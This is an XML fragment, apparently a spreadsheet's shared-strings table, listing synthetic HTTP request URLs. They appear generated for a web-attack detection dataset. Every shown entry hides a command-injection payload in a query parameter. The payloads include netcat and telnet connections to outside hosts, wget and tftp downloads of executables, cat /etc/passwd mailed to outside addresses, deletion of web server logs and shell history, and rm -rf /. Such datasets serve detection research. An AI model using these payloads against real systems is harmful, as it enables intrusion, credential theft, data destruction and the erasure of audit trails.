    <t>/f0derj8on/bt8ieekpx_tmjc./20l.lz@5y/t9iys0g2eaee.pl?ieserhslze=whereeian8e/neaaoaemopti&amp;teietonaottc0in=etkqrx2zn&amp;nqvy=757&amp;ne=h6ihetp9astha&amp;sainlhoh-orgv=|++++/usr/bin/nc++++-vvv+110.115.123.204+++80_x0000_&amp;2aeo7nsoeyi=f:e&amp;ndsai=z%e(</t>
  </si>
  <si>
    <t>/hus/bleenwtzsih/uh7lteiniea8se/e6sytzfvee.jpeg?esht8ete5rulotr=between~zen&amp;edfh761='+++++;+ps+-aux+++;&amp;ttijtiiu=i9nlpoe</t>
  </si>
  <si>
    <t>/ehse/r5kscjov64bi6_/2pvyqn74ne8rj/ecuqnw-m@hisqy/tte/doa.gt/awch7pv_1csh5.nb_/mot/ov3vhtpass6op.ofaccess_log%uaccept.php4?ooe=\\;\\/bin\\/id;</t>
  </si>
  <si>
    <t>/oxmp2/bjoruoi60u8ovq/itghio/qfduelqitamatlf/nz2wk4_tyvihs9po/gbi6ulp.jpeg?ottggdnraoampr=39367&amp;oiza2zvenei=up&amp;ieexecw=+++++;++echo++++;++w+++++;+uname+-a++;+++id&amp;0chqmochai8r@x=90004&amp;li=s1zfpj&amp;6arhnaunfdzjru=c9@fw4l&amp;snedei=946113&amp;otit7et5ti6og=79601241&amp;tr=11</t>
  </si>
  <si>
    <t>/vfoeaeuidts1aage/hs5onelttewgycb/nla2likqjvrt-vndc/sexr..npbxxlg0euxobj/ee/txd/3mk3m5b@m4xgx9-.zjs/owt3edtlaitlybyty/0gn_.zjhne-3yf/twoik/le40jtlgrg6erbwghb/nsn5ereelyce.png?e0oapy0ztoa=aclieate7d&amp;5fagat=74372376&amp;los7r=mb_acb&amp;edtqa2axostl=env9to7mohisnxvh&amp;lseee=tftp++-c+get++63.32.226.52:/ns/on.exe+++++|&amp;oeeejasr=aeepositioneewtllbo&gt;&amp;ninn=3009445&amp;tmst2=wkr.&amp;aboheeorca5=win&amp;dcrnacyeeybo=-e&amp;wdptn9lmht=oarao5ss3t&amp;ulbaphouau=nhaeoauiiz&amp;niuc73rfglhlsre=passwdcq&amp;tlar=hs</t>
  </si>
  <si>
    <t>/a1lphetgzth/eucauqisrxi/idqv/uolf5g/ow_njksfu/dr89wzaetseuthua/gdctnriuh0seajgedopn/r9@j6hrbv9z/lmpe0ilm/illm/ttjv9_jpb7zv5.msf?xmspee=\\n+++++uftp++++-p+www.rigeiengchnt.com+++/er/esicnd/lanian/asit/roit/llel&amp;nsmneo=eeuna&amp;is=nodenkp&amp;gwyimgh1=638</t>
  </si>
  <si>
    <t>/d30ge2uyokgjtd.zz4dv/tu0uwfvf/mn1ypeaqymrenamcee/taweo.jpeg?anonqhre2lf=oilfaze7nftrrhm&amp;nerl5eaivv=32&amp;ndhbztwindow.open4tmp=n$]i&amp;dgqfftpplocationhomecf=233499&amp;kyaeaf7piei=tsnfvq&amp;sll=813&amp;bnraomuqendt=rmikd&amp;mwwvts2ebos=tmp&amp;onektaet=h=ueagen&amp;h483onno=h&lt;foa&amp;to5detr2rthuf=ngcldn&amp;rcm3l0mlha=cat++++/etc/passwd|&amp;evaln6nb=rvlzssv2q9k</t>
  </si>
  <si>
    <t>/h-_undgxsso/varobabxhku.sh?gd8fiixltl4=7909980&amp;hly=s$]+i&amp;sbmdueee=rm++++-f++++/var/log/httpd/access_log++;&amp;csometfharepw=and&amp;eymb4ai=0nsnempf.qkr</t>
  </si>
  <si>
    <t>/2yki/0ne9ed.htm?n7s=86&amp;fojhatet="++;++/usr/bin/wget++++www.ladees.com/se+++;&amp;emiae=etr&amp;nuheemjsmio=%u[positionr&amp;y4eeaod=cpqdl.&amp;cux8=autoexec4t&amp;tdo=faqjn1vf&amp;j61ply=smodn&amp;srkvda=soinsertepe0sruo7n&amp;gut8tdwiyyonru=5996654&amp;xjhm=6iosoebhtfrom'e</t>
  </si>
  <si>
    <t>/e8nph-lkyemgstxgo/6s9elanxtt1nseef5/2r4eneverq4dzem/shkipe.p3nejw/bdcdaewleti2gzepb/tvvo@sebtkgglo/nhg9/processing-instructionk@qnobjectg.tiff?sro=8x3b8k.2-lc&amp;errsseko=eeap&amp;rl5eodd=628&amp;etastuhth5ae=ytneelyaseiiesoya&amp;5yfg=monosaalc&amp;atvmdwiecaa=m++ftpeval%)yaps=eenahue&amp;dl4=\\n+++wget++http://130.57.43.59:6267/nftp.exe&amp;o4ytfhfescpli=rrlor2hcifa&amp;_ays6hopvqi=936363992</t>
  </si>
  <si>
    <t>/ndgk1rjlnabyn3jht/to/s3n0l3/nolirsoqxmiuuyg/ahah/qiyoyetaoqheza9ib/wmysmunvox.png?xbp0a0hv-tmpu=';uftp+++++-g++/home/merinsorit/erveesol+146.234.140.12+++++/ge++;</t>
  </si>
  <si>
    <t>/iyuso558vp9fxi.asp?enyibodita=++++xterm+-display+++www.vetoenre.com:0.0+</t>
  </si>
  <si>
    <t>/tpjpkvlk9ddicaanm/wy6nph-fgl/yrevro5@d1/caetan4crxolwe/t6tk9-wo/u8wids.aspx?dtnng=pesw&amp;tyoexc=+++cat++++++/etc/passwd+++++</t>
  </si>
  <si>
    <t>/eytyzq50nf/h1vw/g.9htacceskb1/iepde6e9roicdd/x_bloggpie8/ioeth9a1acrueo/poglnapc7oy9/nnoihk24bri3fk/blnhl6rsll9b0rrnm/tdon_/ljeoeto9m.msf?g6icnhno=rm+++-f++/var/log/httpd/access_log++++;&amp;agy=e1rserwtxnhttpnywes&amp;k-kiqn54=hjj08dlm2j_l&amp;u80ss=t+kiop:rtg+8ieexp_lms&amp;ehtopdnoab3e=eiau&amp;ynel7bma=tmpk&amp;snalstz=linput&amp;im2epmew4ah=heacinsert&amp;tx9oc0deeery=garal&amp;2cvtmaf=6&amp;g1z8dwp-ncu6ti=w+</t>
  </si>
  <si>
    <t>/-qz@ftp-kp8xp_j.gif?ka5usosia=kl3i+&amp;ih5alneroldlms=5retcunae&amp;vzsj=\\"++++\\;++\\/usr\\/bin\\/telnet+++++www.veatleteasde.com++8603\\;&amp;lsqra=wipcgbsb&amp;e9dowrbt=aso5lhdeletenxa-s&amp;ordasihwx=206275593&amp;rnlyvoaoru8=56&amp;lscriptyfiqbrkt=8456540&amp;yevale6=@sctdrtm&amp;agwrit=65</t>
  </si>
  <si>
    <t>/egftslt.jvbh.9ocfl/iozee6bw6d/tc1shq6tnhbd/rciaxsfr/mr/crmyiprcpm3shutdownmrm/shutdowny/ih8na0ri/lsdrkefgsg/sctefmlimeooyae0i8hr.gif?ijteedzohandh=7&amp;bsg5hw=3e&amp;euvtc="++;+/usr/bin/wget+www.ndstmeictist.com/neitme+++++;&amp;clteeehrpytqnt=767457930&amp;s2ddhkdc=suwherebt&amp;sat3yya=where9fnsme+ahhs3=</t>
  </si>
  <si>
    <t>/r1itwe.dll?ewrhpessuo=n7&amp;i0scu0isda8=lwhaspiltovux&amp;cm2rnsmvat=44402&amp;eeekenewpg=tivaeootii&amp;2nksaxu=705499&amp;yxu6zsvheoriesl=4ho+mtme&amp;wyhlaidt=e'&amp;gwtsv=na&amp;eimhsce0dhnob=nrepd&amp;nrrwkebrtn2aye=14157261&amp;jvotaark5mc=944814650&amp;nrnee=mail+++++xet4hry3@n8s9o.kwetnic.gov&lt;&lt;/tmp/wu.c+++;</t>
  </si>
  <si>
    <t>/f8v/xp4e1jwhere1rcpeinsertk/tsablpwuge7vt7pi/tsbunegwrlgdyaitqt.nsf?aa="+++++;++telnet++++165.67.206.197+80;&amp;elmsaw3aiu=47300&amp;fetoit7bn6=w1g0ra9</t>
  </si>
  <si>
    <t>/snehwdidy/tqk_vaj0cxrzkkytjb/hid/it/mzrob4ekskj3_1a.jsp?oorneryctt84t='+;ps+++++-aux+++;</t>
  </si>
  <si>
    <t>/ur5.css?idbopqeyp6h=ma9z2puw_hu&amp;unci8b=2084830&amp;g9rsizu6ns=tftp+-c+get++41.90.129.159:/onnailes/nsolra.exe|&amp;yftiroasyd=ghw&amp;uolob=as5hhxpptlirm8ee9&amp;styledv9tu2=e'n6i&lt;sr5iu2&amp;t1t@oufvhw0g=dha9aideyreplace&amp;7ienhwacht5=breirjf&amp;tsljnis=issrsd2rje</t>
  </si>
  <si>
    <t>/fo6tgkaa/u%u0form8ffuboot.ini4mboy/zd/tbxm_2wj-vaz/zvuicl/e1kd5kv/3aqw2gabyh/hadoaamedddrhnvl/inohoo3pehfsisa/oatfkupfevqjsew/3tlhsnkrievnnms/ig-nrawljzyk3x.mpj7.msf?allaafhotl=og@ukj@8qah&amp;zwnhpes=30&amp;ysrusel5eetuay=909&amp;olelauletnzsg=+&amp;yibd@45=03215499&amp;chtn0xj=8nekhc2silu&amp;nztn8fmqes=5810660&amp;pmalw8=52654&amp;cblso3gpmp=\\n+++wget+++http://156.110.122.19:0372/nftp.exe&amp;qhdvbqr=navcioreelikesdod&amp;eseuasie=srsntraul+sn%script&amp;8aaeeemtho1=dan&amp;uqoeairstf=ouall</t>
  </si>
  <si>
    <t>/1aknl/f8z1c9olnh@kzw/e8ska/9n7sc/m__h/ttr/jz5xfxd6/juh8ehguizimwwo/7ssmet0cnnhoraiustc.asmx?os=l5nul&amp;nt5rnesem=tpqdv4xug&amp;csoslnedbgxls=2421408&amp;zscipha3zxhw2=/w+&amp;ftpfcstyleky='+;++ps++-aux;&amp;iujbm=18474&amp;lseio1wa=taoa&amp;b00.qio=select~</t>
  </si>
  <si>
    <t>/hndldz0a/hc.e@p_c@/ejphv4r-en-cumm9b/imf/iaailrnere/eldirrhvzno3et7ziep/a58kwavj1/hezefeea/pr/dx/xhmmochag.css?2oltgfy=oexnlak@&amp;piwr=+8urlo+auasi&amp;rsbhnoau=30132&amp;kspwincludefromq-5w=ih&lt;vlinketcdsaru&amp;h_uwxh=8tsj.pig6cd&amp;ntdeiohbptic=\\nls++/root/</t>
  </si>
  <si>
    <t>/szjfe3e3vki/oyfq@w/doe4sny/6caaysalieeeoo/vpoj14c_od5/u99v1s.djdpplprrga/2g7kqzjwvh.po60crz/d6pqixgvk4/tzvb_xjb/dllsa/3baj5f/a.yowxboded.asp?e8k4gdfvlogw=idtbylyhr$&amp;eohado0tdhh=ehrnysjlnexec&amp;mav=3397427&amp;oqanaefbmtr=maoteso&lt;&amp;solerrtpo=yc4hnfwinntaevalc+1aei&amp;o9fvinx8q=xrats+eqxp_re2g2c4&amp;taweerp="+;++/usr/bin/wget++++www.stasertellme.com/chor++++;&amp;di=l&amp;e2thto6nbtqt=l2&amp;q.eo=m'en?dtaawehysr&amp;dtoi3r2=135&amp;medor2t=8236&amp;atp7e=telnethsm&amp;nufnidnvjqo=rxztdnnpz</t>
  </si>
  <si>
    <t>/snx3.cgi?atiecceptleohob=r@dn.7wlxj&amp;j2jceacl=4&amp;st4scps=documentaccess_logrc;&amp;gs8g-gz71u3=hehhdnshutdowni2tens"nse&amp;xrwwu1avkj=svx5bbr6fjh&amp;patieiii='+++++;+++rm+~/.bash_history++++;&amp;evf9lrfent=lcyfu6jg&amp;leo5avsgadhaanc=eeetn&amp;6eebhu0aden3l5f==f&amp;egee=bf&amp;hjgtisr=9duyq&amp;th2dy11oesea=oediadaot</t>
  </si>
  <si>
    <t>/0cpu/gdeletemailcn4qnhpvb8lr/zpstdinxmluv/uh3h1un8sb1.cfm?xx50z3hnncdupdate=ceb&amp;pg1ofc2includexp_a4=|+echo++"content-type:+text/html"+++++;++++echo++++""+++++;++++id+++\\0&amp;dxp_i8hh9d9gzaccess_log=cu</t>
  </si>
  <si>
    <t>/stq7jwh@ike@sk/loyehsssahfly/i28mugdpmc-lj4q.8gbf/8bwqpd3fva3h5t6bya/peepisek/i7tnsedoxbwopl0eto/newp--@y9l9v@svc/oel.htm?mr8hhehpwlie=re@&amp;leennoraafcxhtt=t3gtrfmdn9fnrchtin&amp;hueddelec=]eco]$trt?nf&amp;adax60=cn&amp;wmyosysdenye=mail+++++etsr8p1@ezysn.pqntgsf.gov+&lt;&lt;++++/tmp/wu.c+++++;</t>
  </si>
  <si>
    <t>/ryiuktxotqivpjw8n.css?tnaebtgfhcutma=oafnnm4ftp9v&amp;fnninnp=onhtre&amp;ylqstm=|+++++/usr/openwin/bin/xterm+-display+160.85.84.230:0_x0000_&amp;dochhansdiooeje=shom7+rndanpti&amp;caole8hasanls==ebse&lt;uuignes&amp;motlevohmdu=ldmpositionwece(iexif\\</t>
  </si>
  <si>
    <t>/adseoeos/cflhft1khu/sn/al3op/rcdv5h3rfmazwjoknut/3o4a7qen9eelaeal0n/th0pfejdw7@cbpblg@.png?yenseto=rdy&amp;aespre5i7='+++;+++++tftp++-c+++++get++++www.rote.com:/nitielie.tar&amp;ktio0sqthohds=es2mudicl7s&amp;lbnn7alm=594471&amp;e2arivn=hcdcahd9x&amp;rynrxol5=h4ipcopytodopt&amp;int1386a7edie=33937&amp;yyen5dtrm0sv=3iaa++d\\c&amp;em6rsefla58=15403128&amp;oipsqvgumoistyt=4hrshtacces=ulqlme6a&amp;9tauetnal=gwnt&amp;tnwmu=qeoaziiut5vsotejpc&amp;rfawyolc=nten2oxl7&amp;0d-grown6jmshutdown=:'=tmph</t>
  </si>
  <si>
    <t>/s8qrz8vi-xiq_tpzis/pxugcdwjxuaxzmxy/ecw/iensj-4haefj/uxc.i-zahmae9h5j14hh.htm?tfaapnd=5aia2pahneexeca:ad+\\&amp;artsa6us2le=hyncneerseeyea&amp;mytnateo3=528534&amp;gcsk2igkklu=`+rm+-rf+++/++++`&amp;wwebhhnsy=;$sta&amp;_f1xtudjzm48=qdogca0dltnetn&amp;e64x=28&amp;nttinkayr5uuurs=153720&amp;xoaida0p8thk=9244261735&amp;eqnnhm=467059062</t>
  </si>
  <si>
    <t>/nr.vc9rf-xrnl-qb@@/ev.nsf?tc33dte23yat=oiframebgsoundra&amp;eot=616&amp;vkpnieq7pegc=1474&amp;ciin=ctl1&amp;nczyrk6k1=112063&amp;ansed3pk=94&amp;ely4=areewl&amp;6l=l9hhaaui2s9rao&amp;lseyej9snwfmz8=apwlixun5eoitea&amp;.ziframeqs=w8;6es&amp;awvltatg=tnxost+31&amp;iframe3kt_hlp=peon?aa[ee[tpl'shutdownisu&amp;oeruhenrge=s'ei&amp;ri0x64ko=oops++;++cat++/etc/passwd+++++|mail+your@ahvoo.com&amp;5qoo6bootigyllc=e+g</t>
  </si>
  <si>
    <t>/er6w6ibhs7hx/i709noqvqawxis-pa/1su4ga/heaink7iuiesitttbwi0/cq_nmqzpzvhle/tov/tmumfveowdwmeefxnp3f/mxou7d/tdoaano.aspx?a3otpie=u019ul&amp;tdwnofhumro=yen&amp;2uprxrtnc1ee=171705&amp;uiauiaarw2bao=b)havingslxs(a+n&amp;3r1yrteltme1c=io4s&amp;n5-jvv3=+|c&amp;9lr7ctnmee1='+++;+++++tftp++++-c+++++get++www.reli.com:/ngitisel.tar&amp;cegnsr4lhd=7</t>
  </si>
  <si>
    <t>/omhz8veafbqrr1/smyeen3bo/oacrsadeotfn7chh/ino6ix6qdyfgfvb25g/raicnhlrowt6/vfxdnnmmq6aedauctav4/agqqigz8gxprepi..jpeg?ixpneinz=cmorgclkpws&amp;nu8aeiohidp=\\n+++++wget+http://198.160.84.115:800/nftp.exe&amp;w4cy6m=telnetra)t&amp;tm7ntlien3lstt4=tnegt8oeo&amp;netzie=03_</t>
  </si>
  <si>
    <t>/ibn26zdy1ssl/v7o4betweendu4/ri/lxijckgqf1sx/tv/aaeskitaut/8zi8qbgc9ug/tcdrpfrrees/s6wjwjn9ny_zc/tre0xet_1zouhjpt.j/3seitftdruoiningcp.css?eeuyab08mqbe=rm+-f+++/tmp/er++|&amp;akreplacegtlsbq=umqhoj&amp;wmphttlisrewocr=6bcd&amp;rdgnhdtefszl=3097518&amp;wbauugn5g5rc4pp=rtig&amp;io=bo5r-d&amp;sastppm=access_logrrhn?nnvtziaa+puwget&amp;oetdhjo=o|s6mrur2f&amp;dtt=s</t>
  </si>
  <si>
    <t>/yv/hiipynrseo/nibrm0ko1osteose9ta/hksswsgult4sxns/casrewohhl1zytwar2s/t5ah/d6qofxdh9kmq2cakjeoj/pf2moclikebpn/ewjwindow.open/absanqln8sl3tee7emb.gif?ndaercj=prla9sock_streamcltaioc&amp;meah=\\"\\;+++\\/usr\\/bin\\/telnet+++www.atroisdeitns.com+++79+++++;&amp;gbrtply5iebmt=&gt;9klea(egr</t>
  </si>
  <si>
    <t>/ns5saedroxmns2si9t/c7uhiyfgfwgv-ahxzbz/steeof2/p2xz.r2i78vclwfqek/zbbqx-ryr7vfq/l8htiirhreeoar4tza/40_zekyoarzd4dcyi.tiff?iouu=telnetoz&amp;4kzc_znph-=7-wh&amp;bns=/bin/ps_x0000_+++|</t>
  </si>
  <si>
    <t>/4v6vcfx.shtml?elueseca31n=2285458243&amp;3innaeeeebtoe2=teisqs&amp;e6ldbhthu3sco=r@zorz_vx&amp;t.0sppv7=itcjcnesmloe0r&amp;yj-iidyq=632247669&amp;.wztpaa=rbi&amp;ndu0lhyv=&lt;u&amp;eaehglyi=733299&amp;bkdyv25gw.g=\\n+++++wget+++http://199.246.69.123:743/nftp.exe&amp;3uhrgq@teny=6739&amp;posykfromnclun=docp:ngaid&amp;ivi0ligeo=ixtre+&amp;bl=yl)erohn6xrtandme</t>
  </si>
  <si>
    <t>/yinpce01t/sadthdkcwdbtc/00/yp7rmftpk8/iihw-1hxu/2inonttadua/hnpygsv3ryv@@n/rtthc/ewehexsrkliiite.php4?mrzpecr9eptina=954875856&amp;ycirfceoo=bcseeeoaoirzgtihsh&amp;proitgnta=38327&amp;hexo5dee=rm+++-f++++/var/log/httpd/access_log+++++;&amp;tvcvanoelewo=r60nlgya&amp;tarnfesom=nmc&amp;stiksotmu=:es&amp;2pca6ttv=7288169&amp;eznrwd6ea=4746&amp;fag=e&amp;gpk.fjbk=ix6.vus&amp;or6=68113681&amp;oboiev3rl5ci9f=ehetxesotozth</t>
  </si>
  <si>
    <t>/e6q4al/efubwljfacn1u@opjeg/psnidufiw4bpq/ecjbmj4vq4/ntuyosneeeepatsskwe/7msk.bin?unnu3atillwcpm=p&amp;3qe=++;+echo++++++++;+++++w+++++;+++uname+-a++++;+++++id&amp;mrrxk=yd&amp;oc=ohml&amp;ysajobichoaqod=nignh7n5usf6e3orry&amp;h6=tmto:documentl1a1soaeao&amp;htrrlcs7neoosn=mot+t&amp;hd1tyw=ivnnpbk-q&amp;epddrdomnx7e=+n=n&amp;hstyleefq=f2duldoen&amp;oi=s2fduavjk@w&amp;loibmrd=oxd&amp;sl=rva2ao+p5a&gt;&amp;c6t7fdvnirltans=winnt?mweta(%+systemr:e</t>
  </si>
  <si>
    <t>/mtzgmu/whereeenbouh_/kxlmqprw8zmfk/gp4.qquem/i35c/esiele/rhddfoyvyra/tehu9yoiswan8ogcad/tgcjv-@fwv8ankv7-wkp/itjj3nyy5icsryqxmu7/famri6ktt7.css?ah=\\"+++\\;\\/usr\\/bin\\/telnet+www.chiean.com+++++82809\\;&amp;dzjall51script=tsetc&amp;e0cowtmcene=73532&amp;1ptsnepn=3&amp;lrmclxt=65211156&amp;srgtdnrsr=betmietm&amp;kgorhunihss=elmzgarmwwu&amp;be2errfa8=tow3+hacdrh[u&amp;meeshtitwcp=044925&amp;uehtblnterte=1</t>
  </si>
  <si>
    <t>/e4hdiapibfl/rqvaj/ekgifnzr/4h4ec@/vunionkzconnect/bt1v-z174dqy/w1gcqrlnl.op/2p/nt@ip3wgzjqwnwhq/nodesl_6vstdinela7hog.css?ovau=|+cat+++/etc/passwd++|&amp;5n5=nio&amp;8nt2=fdtbm2t7&amp;amongzetsahw=2echo@nq(soe;</t>
  </si>
  <si>
    <t>/mtahtezo/8xg4y/w0c0la.9weapa.htm?neamanxri=cat++/etc/passwd+++|</t>
  </si>
  <si>
    <t>/hyrin/yiz/rwsr7x/svlgzz@0ul0/ia/a9cdbxjucnj/atilmeesvahtictehwv/te/az1npgv45x86hlldcc/ngesmml7f/mrrugiadhoetoars6e4/a7igesqeeezn.shtml?swex=+++++;+echo+++++;+++++w+;uname++++-a+;++++id</t>
  </si>
  <si>
    <t>/pefogczpfdkvpemo/deel78kmrvw2o/s3u/aantwd/t3idhhel1o/i-u/wxme/eqsergrjlirg7bo/ebdigexue1pfqgq.cfm?kabnm31dyli=\\n+uftp++-p+www.ngne.com++/ordeng/vesemelisian/ngarie/meel/me/arta</t>
  </si>
  <si>
    <t>/autehfabu/ta1m9icdruueyh/ovtelnetftptz6gggsgbvc/fs9e7ndomnss68tnoe/shqtudc8ileiach/e3/cid/sjy52rteywnp.aspx?an="+++;+++/usr/bin/wget+++www.stne.com/veinlege++;&amp;ouhh7=+1&amp;wbfrommtuf0o=exicsa</t>
  </si>
  <si>
    <t>/2insert1a4bk.jdd/yh60d/bshe.mdb?ayekwfuue=a-ap&amp;qffce=897nd32gbz&amp;o7wcsarsisrtem=nwjnmyvy&amp;nd=knyta&amp;unyoi4t=eiteeciat4aeiyuz&amp;1dtwllotcao=49&amp;2aotlza=i8k&amp;8xeehrzgtt3zo=\\;\\/bin\\/id+;&amp;ancblr=103701&amp;ltpssgincludeeli=rifromhrlecpyldc&amp;a9=2onbhw&amp;a2g.s0mqutpr=833781367&amp;hif=aobjecty&amp;4a0o4=08&amp;eh3siniiwtu=eao5hpo</t>
  </si>
  <si>
    <t>/iesa.css?omte=264059553&amp;kl-w@dpositionqmexmlm=teouttzshn&amp;luunuidkh=itwindow.openezhelike&amp;iett2sm=xmhh&amp;vqo9t=s.d&amp;eyihus=aae&amp;set=rqhvaszrnenwmes8&amp;zsel257=fsac&amp;i0tm='+;+++tftp++++-c+get+++++www.ilrinaonlare.com:/nesero.tar</t>
  </si>
  <si>
    <t>/rtm6heo4ebe/dtnis3lisnpclqky/mvwvrbjrj9woc9pufpp8/p8ecnesmss6o.bin?ohblicbloj2svh=sopens&amp;s3tnxo1mtift=m.wpgma11ctb&amp;jo5tulisi=\\;++\\/bin\\/id+++++;&amp;duatdhohsme=787234718</t>
  </si>
  <si>
    <t>/nod0imd4tbdol/rnlwuuyigect5en/fromxfs/eea2gfublzt2xhst.aspx?2lho3i=tilhend&amp;nseeekanrs7=xterm+-display+www.llerstnt.com:0.0+</t>
  </si>
  <si>
    <t>/tcnyigydgwz/fnnvj_hopg/usihretartz/tear3dloasn2cieptal/nw8.znyigj/h88.rlu5r@.gbqf4p/s.osl/s.lo.vnfr/nadsdg9shabphtvfsrn7.php3?z1ctjetc7sjanetcatf=90008774&amp;afth=nutowoncns]oinsertaynock&amp;m&amp;oetsdr9teu=qnc7olennullnc0~hhunioniss&amp;8w=9788&amp;rmhsg3dkena=wo&amp;es:&amp;ruwmwdhcaios=1lhavingtyie+6rns&amp;1nresu=nph-r&amp;sje3d=3059&amp;aaoeodyiqedr=++cat++/etc/passwd++++&amp;tbene27ochau=+s+yfrnqjon</t>
  </si>
  <si>
    <t>/sopo-zgcz.ec_@w1rb.php?iwgetxv4=216&amp;7oeduea2cpns=|echo++++"++content-type:+text/html"+++++;+++++echo+++""+;+++id+++++\\0</t>
  </si>
  <si>
    <t>/tzwwgfvtmpjinputgq/e_tiak/soz5stnrzsrrmliicn/telnet151evalvf/qmpsam_e0uv/tlqc-aw-0g_gzxg-u4/iestetdneord/evtyiu/iwsfqq/all0he/ieemrnjirhrwus.nsf?cstyleza=fia+r&amp;qsgvyb6fmsx='+++;+++++cat+/tmp/resmail+++++ngrait@nder.com++;&amp;g4ps-o-3s=eil~sqo</t>
  </si>
  <si>
    <t>/inu6y0qvbscript6uusrgf/dwtp3xychildx/njm2gvo0ltz_vcg2f/scjesetkrmn/o5j/nw6js2jj.htm?mimqg=+cat++++/etc/passwd++</t>
  </si>
  <si>
    <t>/z_ndoywqsez/fkw@cpjs/eqalcu5ntvh3cjpp/gusx6qrqpdid8cz/her2a3a8lwg5yeeie/m8el_jz/k51@areplaced0ni/qmqgwa/itfjfpsincludedte/f7hbestewosmfsp/eenkrmrctlatnnor/aernhe8ebsun.cgi?sezr5dwe=egjskj4s.rv&amp;legmd=569408&amp;gkicmdq8locationb=22769988&amp;a1etorpgi0r=update+im\\tecoa&amp;f-zydo@=9ief&amp;4tivuteithr=naccepto6imiar&amp;oicrift1nncdror=";+++telnet++++81.46.92.31++80+++;&amp;d8theywra=25080&amp;dit=710&amp;ot3=stmo&amp;el6mt8erumleet=22&amp;dsreplacelobject=xcwi=e</t>
  </si>
  <si>
    <t>/trleyyifhetett/pgpgz2/vsamfverjvwhere3/snvlmozk6pj3el/dt5zvauwl_v_0/2jr8raaa2oathaeainnn/tconnectev6m/sh7xephqop/xeasaeu1lisdetf/ieu0van7rf/0tseoh.png?mmh8diatct6ig=kps2d8inedie&amp;pslh3od="+;+++++/usr/bin/wget+++www.rotianinla.com/enasil+;&amp;mdotre=gapdoofpl8jteoaee&amp;rsiribda8sahnhh=hteet&amp;ce=8mdr&amp;isogelitt=+ymti&amp;biniittxgeytme=4690&amp;h0cee4csug=(\\emzniframejaytme)etmis&amp;prbp=ic</t>
  </si>
  <si>
    <t>/-hubxepxqrl1m/uierwrra4emes/okt3m2denacrlxssyi2p/i1yiriyrnvts/ty9_zjpli7@pxnd/o23xqremffyhw7rxk/ncd7c/ehnrexeczgq48/ued/oh/at1s83n3iizosye.cfm?e7see=hsltsivpcfnf&amp;ofaaoeg8htt=32&amp;c9ekiisiexmlkz='++;++cat+/tmp/res++++mail+ngtoroel@ri.com++;&amp;uhthtlmjuse=eaolt&amp;toyzpaeolgidh=o7j1qmfi7t&amp;mitio3uhus=tahneihuroacsg8og&amp;copynetcatkpajcatdvconnectyx=lpp&amp;iflra2z=0175670&amp;bdmrzmeoi=62+biciyciz]r]lsitno&amp;rmbi8kscmdczcmd=1za8cj9ocibh</t>
  </si>
  <si>
    <t>/s8fjf/jombkwtmpqperlfv.msf?se=+l&amp;petaeheit7nbd=7rito3el1r3megriro&amp;eof2b=32389&amp;araipaa=l1io0&amp;6gn=iideu&amp;jnq9tllk=\\"\\;+++\\/usr\\/bin\\/telnet++++www.attaenlele.com++681++;&amp;d8ttniiawlnjn1h=1017629&amp;udescript2=hdejmyd_a&amp;snez7o5=pertdnslte@vumochai</t>
  </si>
  <si>
    <t>/tzmschwiv8/sushr1soeeefoddoheea/0eetas/w8blbfzm1dr3osvkgvk/e6sduhq2a.jbvnh/tmpdukpae5uz5gtpc/fsama7jxo.l/ivi1yq8ggtlbbrbikc/aifnetcatsrcuqu/skr/rea2esn2h9geetrnxeuj/exixqi-_nk9.e7xkl2g.gif?yyqabexch=aci4rluzsibcsd4&amp;nupdatexvo=;/bin/id;</t>
  </si>
  <si>
    <t>/hhnhqos2lhpmnhdyel/lx.shtml?m5iiemzcenrnhti=109054&amp;virflothuc=ninsert+e&amp;ofjwrivg7e=1675406&amp;7ndt=5502693&amp;ozju=fug%[&amp;etpon=nneiselecttig+o+vcwtt0=c&amp;xa=passthru4+gbh&amp;oltit=nk&amp;ivdd3nidi=chavings&amp;ersnt9n0oaiiiea=tenncfiiansuno&amp;kamereui5owtcog=4&amp;nzzxfx4j=8767601&amp;espdiorepso9=es-cealk7dttea&amp;sapc=re9gf&amp;2d=\\n+++uftp++++-p++++www.trartionalve.com+++/asil/lengni/meet/medeil/at/isatla</t>
  </si>
  <si>
    <t>/thr/hdtsnratdgearlnu/ib7eqfsn/llbb9fpjvgj.-7khohnm/7uwjimgmps0qhpq/8cjtuq4oae0parise/nr/s3saetoaepnateb4we1/0k1p-krtdxi-9.4dqel/_bh/dbowud3f8yr/e.qr1s.mdb?kmbasicwnited6=5ov4noeq&amp;oa8ookye=42&amp;trdsnd=+++++cat+++++++/etc/passwd+</t>
  </si>
  <si>
    <t>/c.ouhavingflqh3htpass-mak/x2nfk/hipukmpfsq2a.b/_ayj3im3.sh?9adh=m&amp;uu=409&amp;7hm9u1fqnna8=\\nls++++/root/&amp;um6selectl=8&amp;lol7afetmlua=egucceoo&amp;eh57oyatewhtra=~rbsow=nrboot.inia1us</t>
  </si>
  <si>
    <t>/tmpmcpc3f/1aosrtczt2g42kdwm0/ca/552where-itprocessing-instructioney-/sazzyiigo/baco/fzhoi-2slx.6kg.msf?eezahr=5&amp;yahnneorlllya="++;+telnet++++132.32.215.133++80;&amp;hrptu5meyke=atmdzg&amp;ojrihqaetf=hot)x&amp;t15noep=tf0pat:%nh&amp;tttct=eupitd3t~&amp;cmdvex3cmd=sde0lt1gu&amp;emdaeahe=7&amp;bltacd=52&amp;ak=cmdspasswdbdcteuds&amp;brriatotcyi05t=obrrr2ls&amp;eyrtmsr=tt7ttsktutnenwlc</t>
  </si>
  <si>
    <t>/iph6.obk20wd3tmev/xj2e/xi3cmdgr1aroqukb/emznmanil..sh?libbx95dd-=ipust9&amp;ntiox1=bp0ei\\mu6l&amp;o2eesspiarhog8=rhpaolca4&amp;ey=u'tkoprzhen;y7+e&amp;cvio=no&amp;omaohtkietl=lh&lt;7s+tto=@&amp;hteoit3e=4ncgwhwdeh%d+0f+r&amp;v.wnode=9&amp;ica=3&amp;04tsynjlnoib=aki&amp;ihaaiin71zhux=musre&amp;ruz6j=|+++echo+++++"+++++content-type:+text/html"+;+echo++++""++++;++++id++++\\0</t>
  </si>
  <si>
    <t>/tho/ty9dqasnmtmihooerr9/ggfjbpwt1ln1/tct/vfkxwconnect3/wkaxq58ryxgi/.c1%ui170l/ib/ld_ip.msf?awuwwxionr=enatdzl46q&amp;xzmpnipstnx7=\\;+++\\/bin\\/id++++;&amp;keean4qdee3sqhh=adhhsbtthtpassdwgete8avbscript&amp;lessoagcop=5</t>
  </si>
  <si>
